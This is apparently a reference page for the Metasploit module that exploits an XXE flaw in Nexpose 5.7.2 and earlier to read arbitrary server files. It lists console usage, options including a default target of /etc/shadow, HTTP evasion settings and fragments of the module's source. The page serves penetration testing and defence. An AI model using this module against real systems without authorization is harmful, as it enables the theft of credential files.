Nexpose XXE Arbitrary File Read - Metasploit


This page contains detailed information about how to use the auxiliary/admin/http/nexpose_xxe_file_read metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Nexpose XXE Arbitrary File Read
Module: auxiliary/admin/http/nexpose_xxe_file_read
Source code: modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
Disclosure date: -
Last modification time: 2022-01-23 15:28:32 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 3780, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number of vectors. This vulnerability can allow an attacker to a craft special XML that could read arbitrary files from the filesystem. This module exploits the vulnerability via the XML API.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/admin/http/nexpose_xxe_file_read
msf auxiliary(nexpose_xxe_file_read) > show targets
    ... a list of targets ...
msf auxiliary(nexpose_xxe_file_read) > set TARGET target-id
msf auxiliary(nexpose_xxe_file_read) > show options
    ... show and set options ...
msf auxiliary(nexpose_xxe_file_read) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • USERNAME: The Nexpose user

  • PASSWORD: The Nexpose password

Go back to menu.

Msfconsole Usage


Here is how the admin/http/nexpose_xxe_file_read auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/http/nexpose_xxe_file_read

msf6 auxiliary(admin/http/nexpose_xxe_file_read) > show info

       Name: Nexpose XXE Arbitrary File Read
     Module: auxiliary/admin/http/nexpose_xxe_file_read
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Brandon Perry <[email protected]>
  Drazen Popovic <[email protected]>
  Bojan Zdrnja <[email protected]>

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILEPATH  /etc/shadow      yes       The filepath to read on the server
  PASSWORD                   yes       The Nexpose password
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     3780             yes       The target port (TCP)
  SSL       true             no        Negotiate SSL/TLS for outgoing connections
  USERNAME                   yes       The Nexpose user
  VHOST                      no        HTTP server virtual host

Description:
  Nexpose v5.7.2 and prior is vulnerable to a XML External Entity 
  attack via a number of vectors. This vulnerability can allow an 
  attacker to a craft special XML that could read arbitrary files from 
  the filesystem. This module exploits the vulnerability via the XML 
  API.

References:
  https://blog.rapid7.com/2013/08/16/r7-vuln-2013-07-24

Module Options


This is a complete list of options available in the admin/http/nexpose_xxe_file_read auxiliary module:

msf6 auxiliary(admin/http/nexpose_xxe_file_read) > show options

Module options (auxiliary/admin/http/nexpose_xxe_file_read):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILEPATH  /etc/shadow      yes       The filepath to read on the server
   PASSWORD                   yes       The Nexpose password
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3780             yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME                   yes       The Nexpose user
   VHOST                      no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the admin/http/nexpose_xxe_file_read auxiliary module:

msf6 auxiliary(admin/http/nexpose_xxe_file_read) > show advanced

Module advanced options (auxiliary/admin/http/nexpose_xxe_file_read):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the admin/http/nexpose_xxe_file_read module can do:

msf6 auxiliary(admin/http/nexpose_xxe_file_read) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the admin/http/nexpose_xxe_file_read auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/http/nexpose_xxe_file_read) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Error authenticating, check your credentials


Here is a relevant code snippet related to the "Error authenticating, check your credentials" error message:

62:	          status: Metasploit::Model::Login::Status::UNTRIED
63:	      }.merge(service_details)
64:	      create_credential_and_login(connection_details)
65:	
66:	    rescue
67:	      print_error("Error authenticating, check your credentials")
68:	      return
69:	    end
70:	
71:	    xml = '<!DOCTYPE foo ['
72:	    xml << '<!ELEMENT host ANY>'

Error executing API call for site creation, ensure the filepath is correct


Here is a relevant code snippet related to the "Error executing API call for site creation, ensure the filepath is correct" error message:

89:	
90:	    print_status("Sending payload")
91:	    begin
92:	      fsa = nsc.execute(xml)
93:	    rescue
94:	      print_error("Error executing API call for site creation, ensure the filepath is correct")
95:	      return
96:	    end
97:	
98:	    doc = REXML::Document.new fsa.raw_response_data
99:	    id = doc.root.attributes["site-id"]

Error retrieving the file.


Here is a relevant code snippet related to the "Error retrieving the file." error message:

103:	    print_status("Retrieving file")
104:	    begin
105:	      fsa = nsc.execute(xml)
106:	    rescue
107:	      nsc.site_delete id
108:	      print_error("Error retrieving the file.")
109:	      return
110:	    end
111:	
112:	    doc = REXML::Document.new fsa.raw_response_data
113:	

Error while cleaning up site ID, manual cleanup required!


Here is a relevant code snippet related to the "Error while cleaning up site ID, manual cleanup required!" error message:

113:	
114:	    print_status("Cleaning up")
115:	    begin
116:	      nsc.delete_site id
117:	    rescue
118:	      print_warning("Error while cleaning up site ID, manual cleanup required!")
119:	    end
120:	
121:	    unless doc.root.elements["//host"]
122:	      print_error("No file returned. Either the server is patched or the file did not exist.")
123:	      return

No file returned. Either the server is patched or the file did not exist.


Here is a relevant code snippet related to the "No file returned. Either the server is patched or the file did not exist." error message:

117:	    rescue
118:	      print_warning("Error while cleaning up site ID, manual cleanup required!")
119:	    end
120:	
121:	    unless doc.root.elements["//host"]
122:	      print_error("No file returned. Either the server is patched or the file did not exist.")
123:	      return
124:	    end
125:	
126:	    path = store_loot('nexpose.file','text/plain', rhost, doc.root.elements["//host"].first.to_s, "File from Nexpose server #{rhost}")
127:	    print_good("File saved to path: " << path)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Brandon Perry <bperry.volatile[at]gmail.com>
  • Drazen Popovic <drazen.popvic[at]infigo.hr>
  • Bojan Zdrnja <bojan.zdrnja[at]infigo.hr>

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.